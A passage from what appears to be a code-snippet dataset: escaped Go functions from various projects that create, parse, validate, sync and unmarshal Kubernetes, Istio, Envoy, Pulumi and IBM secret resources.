core.UnmarshalPrimitive(m, \"id\", &obj.ID)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"labels\", &obj.Labels)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"locks_total\", &obj.LocksTotal)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"name\", &obj.Name)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"secret_group_id\", &obj.SecretGroupID)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"secret_type\", &obj.SecretType)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"state\", &obj.State)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"state_description\", &obj.StateDescription)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"updated_at\", &obj.UpdatedAt)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"versions_total\", &obj.VersionsTotal)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"data\", &obj.Data)\n\tif err != nil {\n\t\treturn\n\t}\n\treflect.ValueOf(result).Elem().Set(reflect.ValueOf(obj))\n\treturn\n}", "func (o *WebhooksIntegrationCustomVariableResponse) GetIsSecret() bool {\n\tif o == nil {\n\t\tvar ret bool\n\t\treturn ret\n\t}\n\treturn o.IsSecret\n}", "func Secret[T SupportedTypes](key string, defavlt T) T {\n\tv := Value(key, defavlt)\n\tos.Unsetenv(key)\n\treturn v\n}", "func (s *Synchronizer) SynchronizeSecret(key string) (bool, runtime.Object, error) {\n\t//\n\t// Get shadow resource\n\t//\n\t// Convert the namespace/name string into a distinct namespace and name\n\tnamespace, name, err := cache.SplitMetaNamespaceKey(key)\n\tif err != nil {\n\t\tutil.HandleError(fmt.Errorf(\"invalid resource key: %s\", key))\n\t\treturn false, nil, nil\n\t}\n\n\tsvcSecret, err := s.coreSDK.GetSecretFromCache(namespace, name)\n\tif err != nil {\n\t\tif apierrors.IsNotFound(err) {\n\t\t\tutil.HandleError(fmt.Errorf(\"secret '%s' in work queue no longer exists\", key))\n\t\t\treturn false, nil, nil\n\t\t}\n\n\t\treturn false, nil, err\n\t}\n\n\tif svcSecret.Name == \"\" {\n\t\t// We choose to absorb the error here as the worker would requeue the\n\t\t// resource otherwise. Instead, the next time the resource is updated\n\t\t// the resource will be queued again.\n\t\tutil.HandleError(fmt.Errorf(\"%s: secret name must be specified\", key))\n\t\treturn false, nil, nil\n\t}\n\n\t//\n\t// Sync service catalog resource back to the shadow resource\n\t//\n\n\t// Get the corresponding shadow resource\n\tshadowSecretName := builder.BoundSecretName(svcSecret.Name)\n\tsecret, err := s.coreSDK.GetSecretFromCache(svcSecret.Namespace, shadowSecretName)\n\t// If the resource doesn't exist, we'll create it\n\tif apierrors.IsNotFound(err) {\n\t\ttbnd, err := s.GetTemplatedBindingFromShadowSecret(svcSecret)\n\t\tif err != nil {\n\t\t\treturn false, svcSecret, err\n\t\t}\n\t\tif tbnd == nil {\n\t\t\t// ignore unmanaged secrets\n\t\t\treturn false, nil, nil\n\t\t}\n\n\t\tsecret, err = builder.BuildBoundSecret(svcSecret, tbnd)\n\t\tif err != nil {\n\t\t\treturn false, svcSecret, err\n\t\t}\n\t\tsecret, err = s.coreSDK.Core().Secrets(secret.Namespace).Create(secret)\n\t}\n\n\t// If an error occurs during Get/Create, we'll requeue the item so we can\n\t// attempt processing again later. This could have been caused by a\n\t// temporary network failure, or any other transient reason.\n\tif err != nil {\n\t\treturn false, svcSecret, err\n\t}\n\n\t// If the shadow secret is not controlled by the service catalog managed secret,\n\t// we should log a warning to the event recorder and retry\n\tif !meta.IsControlledBy(secret, svcSecret) {\n\t\treturn false, nil, nil\n\t}\n\n\t//\n\t// Sync updates to service catalog resource back to the shadow resource\n\t//\n\ttbnd, err := s.GetTemplatedBindingFromShadowSecret(svcSecret)\n\tif err != nil {\n\t\treturn false, svcSecret, err\n\t}\n\tif tbnd == nil {\n\t\t// ignore unmanaged secrets\n\t\treturn false, nil, nil\n\t}\n\n\tif refreshedSecret, changed := builder.RefreshSecret(svcSecret, tbnd, secret); changed {\n\t\tsecret, err = s.coreSDK.Core().Secrets(refreshedSecret.Namespace).Update(refreshedSecret)\n\n\t\t// If an error occurs during Update, we'll requeue the item so we can\n\t\t// attempt processing again later. This could have been caused by a\n\t\t// temporary network failure, or any other transient reason.\n\t\tif err != nil {\n\t\t\treturn false, svcSecret, err\n\t\t}\n\t}\n\n\t//\n\t// Update shadow resource status with the service catalog resource state\n\t//\n\terr = s.updateSecretStatus(secret, svcSecret)\n\tif err != nil {\n\t\treturn false, svcSecret, err\n\t}\n\n\treturn true, svcSecret, nil\n}", "func createSecret(t *testing.T, options *k8s.KubectlOptions, namespace string) string {\n\tconfigData := fmt.Sprintf(EXAMPLE_SECRET_YAML_TEMPLATE, namespace, namespace, namespace)\n\tk8s.KubectlApplyFromString(t, options, configData)\n\treturn configData\n}", "func UnmarshalSecretMetadata(m map[string]json.RawMessage, result interface{}) (err error) {\n\t// Retrieve discriminator value to determine correct \"subclass\".\n\tvar discValue string\n\terr = core.UnmarshalPrimitive(m, \"secret_type\", &discValue)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"error unmarshalling discriminator property 'secret_type': %s\", err.Error())\n\t\treturn\n\t}\n\tif discValue == \"\" {\n\t\terr = fmt.Errorf(\"required discriminator property 'secret_type' not found in JSON object\")\n\t\treturn\n\t}\n\tif discValue == \"imported_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalImportedCertificateMetadata)\n\t} else if discValue == \"public_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalPublicCertificateMetadata)\n\t} else if discValue == \"kv\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalKVSecretMetadata)\n\t} else if discValue == \"username_password\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalUsernamePasswordSecretMetadata)\n\t} else if discValue == \"iam_credentials\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalIAMCredentialsSecretMetadata)\n\t} else if discValue == \"arbitrary\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalArbitrarySecretMetadata)\n\t} else if discValue == \"private_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalPrivateCertificateMetadata)\n\t} else {\n\t\terr = fmt.Errorf(\"unrecognized value for discriminator property 'secret_type': %s\", discValue)\n\t}\n\treturn\n}", "func createSecret(ingressType ingress.CallType, cn, ns string, ic IngressCredential) *v1.Secret {\n\tif ingressType == ingress.Mtls {\n\t\treturn &v1.Secret{\n\t\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\t\tName: cn,\n\t\t\t\tNamespace: ns,\n\t\t\t},\n\t\t\tData: map[string][]byte{\n\t\t\t\tgenericScrtCert: []byte(ic.ServerCert),\n\t\t\t\tgenericScrtKey: []byte(ic.PrivateKey),\n\t\t\t\tgenericScrtCaCert: []byte(ic.CaCert),\n\t\t\t},\n\t\t}\n\t}\n\treturn &v1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: cn,\n\t\t\tNamespace: ns,\n\t\t},\n\t\tData: map[string][]byte{\n\t\t\ttlsScrtCert: []byte(ic.ServerCert),\n\t\t\ttlsScrtKey: []byte(ic.PrivateKey),\n\t\t},\n\t}\n}", "func getSecretType(sType string) corev1.SecretType {\n\tswitch sType {\n\tcase \"kubernetes.io/basic-auth\":\n\t\treturn corev1.SecretTypeBasicAuth\n\tcase \"bootstrap.kubernetes.io/token\":\n\t\treturn corev1.SecretTypeBootstrapToken\n\tcase \"kubernetes.io/dockerconfigjson\":\n\t\treturn corev1.SecretTypeDockerConfigJson\n\tcase \"kubernetes.io/dockercfg\":\n\t\treturn corev1.SecretTypeDockercfg\n\tcase \"kubernetes.io/ssh-auth\":\n\t\treturn corev1.SecretTypeSSHAuth\n\tcase \"kubernetes.io/service-account-token\":\n\t\treturn corev1.SecretTypeServiceAccountToken\n\tcase \"kubernetes.io/tls\":\n\t\treturn corev1.SecretTypeTLS\n\tdefault:\n\t\treturn corev1.SecretTypeOpaque\n\t}\n}", "func ParseResourceName(resourceName string, proxyNamespace string, proxyCluster cluster.ID, configCluster cluster.ID) (SecretResource, error) {\n\tsep := \"/\"\n\tif strings.HasPrefix(resourceName, KubernetesSecretTypeURI) {\n\t\t// Valid formats:\n\t\t// * kubernetes://secret-name\n\t\t// * kubernetes://secret-namespace/secret-name\n\t\t// If namespace is not set, we will fetch from the namespace of the proxy. The secret will be read from\n\t\t// the cluster the proxy resides in. This mirrors the legacy behavior mounting a secret as a file\n\t\tres := strings.TrimPrefix(resourceName, KubernetesSecretTypeURI)\n\t\tsplit := strings.Split(res, sep)\n\t\tnamespace := proxyNamespace\n\t\tname := split[0]\n\t\tif len(split) > 1 {\n\t\t\tnamespace = split[0]\n\t\t\tname = split[1]\n\t\t}\n\t\treturn SecretResource{ResourceType: KubernetesSecretType, Name: name, Namespace: namespace, ResourceName: resourceName, Cluster: proxyCluster}, nil\n\t} else if strings.HasPrefix(resourceName, kubernetesGatewaySecretTypeURI) {\n\t\t// Valid formats:\n\t\t// * kubernetes-gateway://secret-namespace/secret-name\n\t\t// Namespace is required. The secret is read from the config cluster; this is the primary difference from KubernetesSecretType.\n\t\tres := strings.TrimPrefix(resourceName, kubernetesGatewaySecretTypeURI)\n\t\tsplit := strings.Split(res, sep)\n\t\tif len(split) <= 1 {\n\t\t\treturn SecretResource{}, fmt.Errorf(\"invalid resource name %q. Expected namespace and name\", resourceName)\n\t\t}\n\t\tnamespace := split[0]\n\t\tname := split[1]\n\t\tif len(namespace) == 0 {\n\t\t\treturn SecretResource{}, fmt.Errorf(\"invalid resource name %q. Expected namespace\", resourceName)\n\t\t}\n\t\tif len(name) == 0 {\n\t\t\treturn SecretResource{}, fmt.Errorf(\"invalid resource name %q. Expected name\", resourceName)\n\t\t}\n\t\treturn SecretResource{ResourceType: KubernetesGatewaySecretType, Name: name, Namespace: namespace, ResourceName: resourceName, Cluster: configCluster}, nil\n\t}\n\treturn SecretResource{}, fmt.Errorf(\"unknown resource type: %v\", resourceName)\n}", "func (d dft) Process(appMeta helmify.AppMetadata, obj *unstructured.Unstructured) (bool, helmify.Template, error) {\n\tif obj.GroupVersionKind() == nsGVK {\n\t\t// Skip namespaces from processing because namespace will be handled by Helm.\n\t\treturn true, nil, nil\n\t}\n\tlogrus.WithFields(logrus.Fields{\n\t\t\"ApiVersion\": obj.GetAPIVersion(),\n\t\t\"Kind\": obj.GetKind(),\n\t\t\"Name\": obj.GetName(),\n\t}).Warn(\"Unsupported resource: using default processor.\")\n\tname := appMeta.TrimName(obj.GetName())\n\n\tmeta, err := ProcessObjMeta(appMeta, obj)\n\tif err != nil {\n\t\treturn true, nil, err\n\t}\n\tdelete(obj.Object, \"apiVersion\")\n\tdelete(obj.Object, \"kind\")\n\tdelete(obj.Object, \"metadata\")\n\n\tbody, err := yamlformat.Marshal(obj.Object, 0)\n\tif err != nil {\n\t\treturn true, nil, err\n\t}\n\treturn true, &defaultResult{\n\t\tdata: []byte(meta + \"\\n\" + body),\n\t\tname: name,\n\t}, nil\n}", "func newSecretForCR(cr *ricobergerdev1alpha1.VaultSecret, data map[string][]byte) (*corev1.Secret, error) {\n\tlabels := map[string]string{}\n\tfor k, v := range cr.ObjectMeta.Labels {\n\t\tlabels[k] = v\n\t}\n\n\tannotations := map[string]string{}\n\tfor k, v := range cr.ObjectMeta.Annotations {\n\t\tannotations[k] = v\n\t}\n\n\tif cr.Spec.Templates != nil {\n\t\tnewdata := make(map[string][]byte)\n\t\tfor k, v := range cr.Spec.Templates {\n\t\t\ttemplated, err := runTemplate(cr, v, data)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, fmt.Errorf(\"Template ERROR: %w\", err)\n\t\t\t}\n\t\t\tnewdata[k] = templated\n\t\t}\n\t\tdata = newdata\n\t}\n\n\treturn &corev1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: cr.Name,\n\t\t\tNamespace: cr.Namespace,\n\t\t\tLabels: labels,\n\t\t\tAnnotations: annotations,\n\t\t},\n\t\tData: data,\n\t\tType: cr.Spec.Type,\n\t}, nil\n}", "func NewSecretFromRuntime(obj interface{}, config CtorConfig) K8sResource {\n\ts := &Secret{}\n\ts.FromRuntime(obj, config)\n\treturn s\n}", "func updateSecret(ingressType ingress.CallType, scrt *v1.Secret, ic IngressCredential) *v1.Secret {\n\tif ingressType == ingress.Mtls {\n\t\tscrt.Data[genericScrtCert] = []byte(ic.ServerCert)\n\t\tscrt.Data[genericScrtKey] = []byte(ic.PrivateKey)\n\t\tscrt.Data[genericScrtCaCert] = []byte(ic.CaCert)\n\n\t} else {\n\t\tscrt.Data[tlsScrtCert] = []byte(ic.ServerCert)\n\t\tscrt.Data[tlsScrtKey] = []byte(ic.PrivateKey)\n\t}\n\treturn scrt\n}", "func (sc *SecretCache) SecretExist(proxyID, resourceName, token, version string) bool {\n\tkey := ConnKey{\n\t\tProxyID: proxyID,\n\t\tResourceName: resourceName,\n\t}\n\tval, exist := sc.secrets.Load(key)\n\tif !exist {\n\t\treturn false\n\t}\n\n\te := val.(model.SecretItem)\n\tif e.ResourceName == resourceName && e.Token == token && e.Version == version {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (s SecretString) Type() string {\n\treturn \"SecretString\"\n}", "func Parse(json *gjson.Result) Resource {\n\tvar res Resource\n\t//Get Types we know\n\tres_type := json.Get(\"type\")\n\tfor i := Type(VPC); Type(i).String() != \"\"; i++ {\n\t\tif \tres_type.String() == Type(i).String() {\n\t\t\tres.Type = Type(i)\n\t\t\tbreak\n\t\t}\n\t}\n\tif res.Type == Unknown {\n\t\treturn res\n\t}\n\t//Put RAW\n\tres.Raw = json.String()\n\t//Make deps\n\tif res.Dependent == nil {\n\t\tres.Dependent = make(map[int]*Resource)\n\t}\n\t//Get Attributes\n\tres.Tags = make(map[string]*Tag)\n\tattrs := json.Get(\"primary.attributes\")\n\tres.Attrs = &attrs\n\tvar alt_name string\n\ttag_pattern := regexp.MustCompile(`^tag\\.([0-9]+)\\.(.+)$`)\n\ttags_pattern := regexp.MustCompile(`^tags\\.(.+)$`)\n\tr := rand.New(rand.NewSource(time.Now().UnixNano()))\n\t(*res.Attrs).ForEach(func(key, value gjson.Result) bool {\n\t\tkey_string := key.String()\n\t\tvalue_string := value.String()\n\t\tif tag_pattern.MatchString(key_string) {\n\t\t\t//We have not-random tags from Terraform\n\t\t\tpattern_matches := tag_pattern.FindStringSubmatch(key_string)\n\t\t\ttag := get_tag(&res.Tags, pattern_matches[1])\n\t\t\tswitch strings.ToLower(pattern_matches[2]) {\n\t\t\tcase \"key\":\n\t\t\t\ttag.Name = value_string\n\t\t\tcase \"value\":\n\t\t\t\ttag.Value = value_string\n\t\t\t}\n\t\t} else if tags_pattern.MatchString(key_string) {\n\t\t\ttags_pattern_matches := tags_pattern.FindStringSubmatch(key_string)\n\t\t\tif tags_pattern_matches[1] != \"%\" {\n\t\t\t\t//Other tag format - use random strings\n\t\t\t\ttag := get_tag(&res.Tags, fmt.Sprintf(\"%v\", r.Int63()))\n\t\t\t\ttag.Name = tags_pattern_matches[1]\n\t\t\t\ttag.Value = value_string\n\t\t\t}\n\t\t\treturn true\n\t\t} else if strings.EqualFold(key_string, \"name\") {\n\t\t\talt_name = value_string\n\t\t}\n\t\treturn true\n\t})\n\tfor _, val := range res.Tags {\n\t\tif strings.ToLower(val.Name) == \"name\" {\n\t\t\tres.Name = val.Value\n\t\t\tbreak\n\t\t}\n\t}\n\tif res.Name == \"\" {\n\t\tres.Name = alt_name\n\t}\n\treturn res\n}", "func (o *WebhooksIntegrationCustomVariableResponse) GetIsSecretOk() (*bool, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.IsSecret, true\n}", "func isValidSecret(secret *v1.Secret) (bool, error) {\n\tswitch secret.Type {\n\t// We will accept TLS secrets that also have the 'ca.crt' payload.\n\tcase v1.SecretTypeTLS:\n\t\tdata, ok := secret.Data[v1.TLSCertKey]\n\t\tif !ok {\n\t\t\treturn false, errors.New(\"missing TLS certificate\")\n\t\t}\n\n\t\tif err := validateCertificate(data); err != nil {\n\t\t\treturn false, fmt.Errorf(\"invalid TLS certificate: %v\", err)\n\t\t}\n\n\t\tdata, ok = secret.Data[v1.TLSPrivateKeyKey]\n\t\tif !ok {\n\t\t\treturn false, errors.New(\"missing TLS private key\")\n\t\t}\n\n\t\tif err := validatePrivateKey(data); err != nil {\n\t\t\treturn false, fmt.Errorf(\"invalid TLS private key: %v\", err)\n\t\t}\n\n\t// Generic secrets may have a 'ca.crt' only.\n\tcase v1.SecretTypeOpaque, \"\":\n\t\tif _, ok := secret.Data[v1.TLSCertKey]; ok {\n\t\t\treturn false, nil\n\t\t}\n\n\t\tif _, ok := secret.Data[v1.TLSPrivateKeyKey]; ok {\n\t\t\treturn false, nil\n\t\t}\n\n\t\tif data := secret.Data[\"ca.crt\"]; len(data) == 0 {\n\t\t\treturn false, nil\n\t\t}\n\n\tdefault:\n\t\treturn false, nil\n\n\t}\n\n\t// If the secret we propose to accept has a CA bundle key,\n\t// validate that it is PEM certificate(s). Note that the\n\t// CA bundle on TLS secrets is allowed to be an empty string\n\t// (see https://github.com/projectcontour/contour/issues/1644).\n\tif data := secret.Data[\"ca.crt\"]; len(data) > 0 {\n\t\tif err := validateCertificate(data); err != nil {\n\t\t\treturn false, fmt.Errorf(\"invalid CA certificate bundle: %v\", err)\n\t\t}\n\t}\n\n\treturn true, nil\n}", "func webSecureSecret(webSecureMode string) interface{} {\n\tswitch strings.ToLower(webSecureMode) {\n\tcase \"true\":\n\t\treturn genWebActionSecureKey()\n\tcase \"false\":\n\t\treturn false\n\tdefault:\n\t\treturn webSecureMode\n\t}\n}", "func RenderArgsSecret(addon *types.Addon, args map[string]string) *v1.Secret {\n\tsec := v1.Secret{\n\t\tTypeMeta: metav1.TypeMeta{APIVersion: \"v1\", Kind: \"Secret\"},\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: Convert2SecName(addon.Name),\n\t\t\tNamespace: types.DefaultKubeVelaNS,\n\t\t},\n\t\tStringData: args,\n\t\tType: v1.SecretTypeOpaque,\n\t}\n\treturn &sec\n}", "func updateSecret(kubeClient *kubernetes.Clientset, secretName string, succChan chan<- string, errChan chan<- error) {\n\tb := bytes.NewBuffer(nil)\n\t// Secrets\n\tsecret, err := kubeClient.Secrets(\"deis\").Get(secretName)\n\tif err != nil {\n\t\tif apierrors.IsNotFound(err) {\n\t\t\tsuccChan <- fmt.Sprintf(\"secret %s not found\", secretName)\n\t\t\treturn\n\t\t}\n\t\terrChan <- err\n\t\treturn\n\t}\n\tsecretNameDet := strings.SplitN(secret.ObjectMeta.Name, \"-\", 2)\n\tpath := \"workflow/charts/\" + secretNameDet[1] + \"templates/\" + secretNameDet[1] + \"-secret.yaml\"\n\tb.WriteString(\"\\n---\\n# Source: \" + path + \"\\n\")\n\tsecret.Kind = \"Secret\"\n\tsecret.APIVersion = \"v1\"\n\tsecret.ResourceVersion = \"\"\n\ty, err := yaml.Marshal(secret)\n\tif err != nil {\n\t\tfmt.Printf(\"err: %v\\n\", err)\n\t\terrChan <- err\n\t\treturn\n\t}\n\tb.WriteString(string(y))\n\n\tfactory := cmdutil.NewFactory(nil)\n\tcurrent := factory.NewBuilder().ContinueOnError().NamespaceParam(\"deis\").DefaultNamespace().Stream(b, \"\").Flatten().Do()\n\terr = current.Visit(func(info *resource.Info, err error) error {\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tobj, err := cmdutil.MaybeConvertObject(info.Object, info.Mapping.GroupVersionKind.GroupVersion(), info.Mapping)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tname, namespace := info.Name, info.Namespace\n\t\toldData, err := json.Marshal(obj)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := updateAnnotations(obj); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tnewData, err := json.Marshal(obj)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tpatchBytes, err := strategicpatch.CreateTwoWayMergePatch(oldData, newData, obj)\n\t\tcreatedPatch := err == nil\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"couldn't compute patch: %v\", err)\n\t\t}\n\n\t\tmapping := info.ResourceMapping()\n\t\tclient, err := factory.ClientForMapping(mapping)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\thelper := resource.NewHelper(client, mapping)\n\n\t\tif createdPatch {\n\t\t\t_, err = helper.Patch(namespace, name, api.StrategicMergePatchType, patchBytes)\n\t\t} else {\n\t\t\t_, err = helper.Replace(namespace, name, false, obj)\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\treturn nil\n\t})\n\tif err != nil {\n\t\terrChan <- err\n\t\treturn\n\t}\n\tsuccChan <- fmt.Sprintf(\"secret %s annotated successfuly\", secretName)\n}", "func canReplace(resource *unstructured.Unstructured, patchErr error) bool {\n\tk := resource.GetKind()\n\te := patchErr.Error()\n\tif (k == \"DaemonSet\" || k == \"Deployment\" || k == \"Job\") && strings.Contains(e, \"field is immutable\") {\n\t\treturn true\n\t}\n\tif k == \"Service\" && (strings.Contains(e, \"field is immutable\") || strings.Contains(e, \"may not change once set\") || strings.Contains(e, \"can not be unset\")) {\n\t\treturn true\n\t}\n\tif k == \"PersistentVolume\" && strings.Contains(e, \"is immutable after creation\") {\n\t\tv, ok, err := unstructured.NestedString(resource.Object, \"spec\", \"persistentVolumeReclaimPolicy\")\n\t\tif err == nil && ok && v == \"Retain\" {\n\t\t\treturn true\n\t\t}\n\t\tlog.Printf(\"Not replacing PersistentVolume since reclaim policy is not Retain but %q\", v)\n\t}\n\tif (k == \"ValidatingWebhookConfiguration\" || k == \"MutatingWebhookConfiguration\") && strings.Contains(e, \"must be specified for an update\") {\n\t\treturn true\n\t}\n\n\t// TODO(rodrigoq): can other resources be safely replaced?\n\treturn false\n}", "func Secret(s *dag.Secret) *envoy_tls_v3.Secret {\n\treturn &envoy_tls_v3.Secret{\n\t\tName: envoy.Secretname(s),\n\t\tType: &envoy_tls_v3.Secret_TlsCertificate{\n\t\t\tTlsCertificate: &envoy_tls_v3.TlsCertificate{\n\t\t\t\tPrivateKey: &envoy_core_v3.DataSource{\n\t\t\t\t\tSpecifier: &envoy_core_v3.DataSource_InlineBytes{\n\t\t\t\t\t\tInlineBytes: s.PrivateKey(),\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tCertificateChain: &envoy_core_v3.DataSource{\n\t\t\t\t\tSpecifier: &envoy_core_v3.DataSource_InlineBytes{\n\t\t\t\t\t\tInlineBytes: s.Cert(),\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n}", "func readYamlTemplate(templateFile string, requirements *config.RequirementsConfig, svc *corev1.Service) ([]byte, error) {\n\t_, name := filepath.Split(templateFile)\n\tfuncMap := helm.NewFunctionMap()\n\ttmpl, err := template.New(name).Option(\"missingkey=error\").Funcs(funcMap).ParseFiles(templateFile)\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"failed to parse Secrets template: %s\", templateFile)\n\t}\n\n\trequirementsMap, err := requirements.ToMap()\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"failed turn requirements into a map: %v\", requirements)\n\t}\n\n\tsvcMap, err := createServiceMap(svc)\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"failed turn Service into a map: %v\", svc)\n\t}\n\n\ttemplateData := map[string]interface{}{\n\t\t\"Requirements\": chartutil.Values(requirementsMap),\n\t\t\"Environments\": chartutil.Values(requirements.EnvironmentMap()),\n\t\t\"Service\": chartutil.Values(svcMap),\n\t}\n\tvar buf bytes.Buffer\n\terr = tmpl.Execute(&buf, templateData)\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"failed to execute Secrets template: %s\", templateFile)\n\t}\n\tdata := buf.Bytes()\n\treturn data, nil\n}", "func (o FunctionServiceConfigSecretVolumeOutput) Secret() pulumi.StringOutput {\n\treturn o.ApplyT(func(v FunctionServiceConfigSecretVolume) string { return v.Secret }).(pulumi.StringOutput)\n}", "func (t TextSecret) GetType() string {\n\treturn \"text\"\n}", "func (mcc *MsgCreateSecret) UnmarshalJSON(data []byte) error {\n var jsonMsg struct {\n Secret *utils.JSONWrapper `json:\"secret\"`\n }\n if err := json.Unmarshal(data, &jsonMsg); err != nil {\n return err\n }\n if secretFactory, ok := secretFactories[jsonMsg.Secret.Type]; ok {\n secret := secretFactory()\n if err := json.Unmarshal(jsonMsg.Secret.Value, secret); err != nil {\n return err\n }\n mcc.Secret = secret\n } else {\n return errors.New(fmt.Sprintf(\"unknown secret type: %s\", jsonMsg.Secret.Type))\n }\n return nil\n}", "func IsResourceNamespaced(kind string) bool {\n\tswitch kind {\n\tcase \"Namespace\",\n\t\t\"Node\",\n\t\t\"PersistentVolume\",\n\t\t\"PodSecurityPolicy\",\n\t\t\"CertificateSigningRequest\",\n\t\t\"ClusterRoleBinding\",\n\t\t\"ClusterRole\",\n\t\t\"VolumeAttachment\",\n\t\t\"StorageClass\",\n\t\t\"CSIDriver\",\n\t\t\"CSINode\",\n\t\t\"ValidatingWebhookConfiguration\",\n\t\t\"MutatingWebhookConfiguration\",\n\t\t\"CustomResourceDefinition\",\n\t\t\"PriorityClass\",\n\t\t\"RuntimeClass\":\n\t\treturn false\n\tdefault:\n\t\treturn true\n\t}\n}", "func (secretTemplateFactory) Kind() string {\n\treturn \"secret\"\n}", "func (o GroupInitContainerVolumeOutput) Secret() pulumi.StringMapOutput {\n\treturn o.ApplyT(func(v GroupInitContainerVolume) map[string]string { return v.Secret }).(pulumi.StringMapOutput)\n}", "func UnmarshalSecretVersion(m map[string]json.RawMessage, result interface{}) (err error) {\n\t// Retrieve discriminator value to determine correct \"subclass\".\n\tvar discValue string\n\terr = core.UnmarshalPrimitive(m, \"secret_type\", &discValue)\n\tif err != nil {\n\t\terr = fmt.Errorf(\"error unmarshalling discriminator property 'secret_type': %s\", err.Error())\n\t\treturn\n\t}\n\tif discValue == \"\" {\n\t\terr = fmt.Errorf(\"required discriminator property 'secret_type' not found in JSON object\")\n\t\treturn\n\t}\n\tif discValue == \"arbitrary\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalArbitrarySecretVersion)\n\t} else if discValue == \"imported_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalImportedCertificateVersion)\n\t} else if discValue == \"public_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalPublicCertificateVersion)\n\t} else if discValue == \"kv\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalKVSecretVersion)\n\t} else if discValue == \"username_password\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalUsernamePasswordSecretVersion)\n\t} else if discValue == \"iam_credentials\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalIAMCredentialsSecretVersion)\n\t} else if discValue == \"private_cert\" {\n\t\terr = core.UnmarshalModel(m, \"\", result, UnmarshalPrivateCertificateVersion)\n\t} else {\n\t\terr = fmt.Errorf(\"unrecognized value for discriminator property 'secret_type': %s\", discValue)\n\t}\n\treturn\n}", "func (s Secret) validate() error {\n\treturn nil\n}", "func (s SecretForDockerRegistryGeneratorV1) StructuredGenerate() (runtime.Object, error) {\n\tif err := s.validate(); err != nil {\n\t\treturn nil, err\n\t}\n\tdockercfgContent, err := handleDockercfgContent(s.Username, s.Password, s.Email, s.Server)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsecret := &api.Secret{}\n\tsecret.Name = s.Name\n\tsecret.Type = api.SecretTypeDockercfg\n\tsecret.Data = map[string][]byte{}\n\tsecret.Data[api.DockerConfigKey] = dockercfgContent\n\treturn secret, nil\n}", "func GenerateSecretAPIObjects(secretConfig *v1alpha1.SecretConfig) *corev1.Secret {\n\t// prepare Kubernetes Secret\n\tk8sSecret := &corev1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{Name: secretConfig.Name, Namespace: secretConfig.Namespace},\n\t\tData: map[string][]byte{},\n\t}\n\tfor _, keyConfig := range secretConfig.Keys {\n\t\tk8sSecret.Data[keyConfig.Name] = keyConfig.Node.Value\n\t}\n\treturn k8sSecret\n\n}", "func (o GroupContainerVolumeOutput) Secret() pulumi.StringMapOutput {\n\treturn o.ApplyT(func(v GroupContainerVolume) map[string]string { return v.Secret }).(pulumi.StringMapOutput)\n}", "func ParseSecret(r io.Reader) (*Secret, error) {\n\t// First read the data into a buffer. Not super efficient but we want to\n\t// know if we actually have a body or not.\n\tvar buf bytes.Buffer\n\n\t// io.Reader is treated like a stream and cannot be read\n\t// multiple times. Duplicating this stream using TeeReader\n\t// to use this data in case there is no top-level data from\n\t// api response\n\tvar teebuf bytes.Buffer\n\ttee := io.TeeReader(r, &teebuf)\n\n\t_, err := buf.ReadFrom(tee)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif buf.Len() == 0 {\n\t\treturn nil, nil\n\t}\n\n\t// First decode the JSON into a map[string]interface{}\n\tvar secret Secret\n\tdec := json.NewDecoder(&buf)\n\tdec.UseNumber()\n\tif err := dec.Decode(&secret); err != nil {\n\t\treturn nil, 